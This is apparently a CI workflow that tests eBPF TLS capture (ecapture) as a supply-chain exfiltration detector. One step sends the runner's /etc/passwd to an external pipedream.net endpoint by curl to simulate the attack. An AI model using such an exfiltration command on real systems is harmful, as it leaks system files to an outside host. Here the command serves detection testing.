name: Run eBPF Supply Chain Detector 2

on:
  push:
    branches: [main]

jobs:
  run-ebpf:
    runs-on: ubuntu-latest

    steps:
      - name: Download and extract ecapture
        run: |
          curl -L -o ecapture.tar.gz https://github.com/gojue/ecapture/releases/download/v1.0.2/ecapture-v1.0.2-linux-amd64.tar.gz
          tar -xzf ecapture.tar.gz
          chmod +x ecapture-*/ecapture
          sudo mv ecapture-*/ecapture /usr/local/bin/ecapture

      - name: Run ecapture in background
        run: |
          sudo ecapture tls > ecapture.log 2>&1 &
          sleep 5

      - name: Simulate HTTPS exfiltration
        run: |
          curl https://903e71dc0c872212a00b1d19477faafe.m.pipedream.net --data-binary "@/etc/passwd"

      - name: Wait for logs to flush
        run: sleep 5

      - name: Show captured logs
        run: cat ecapture.log
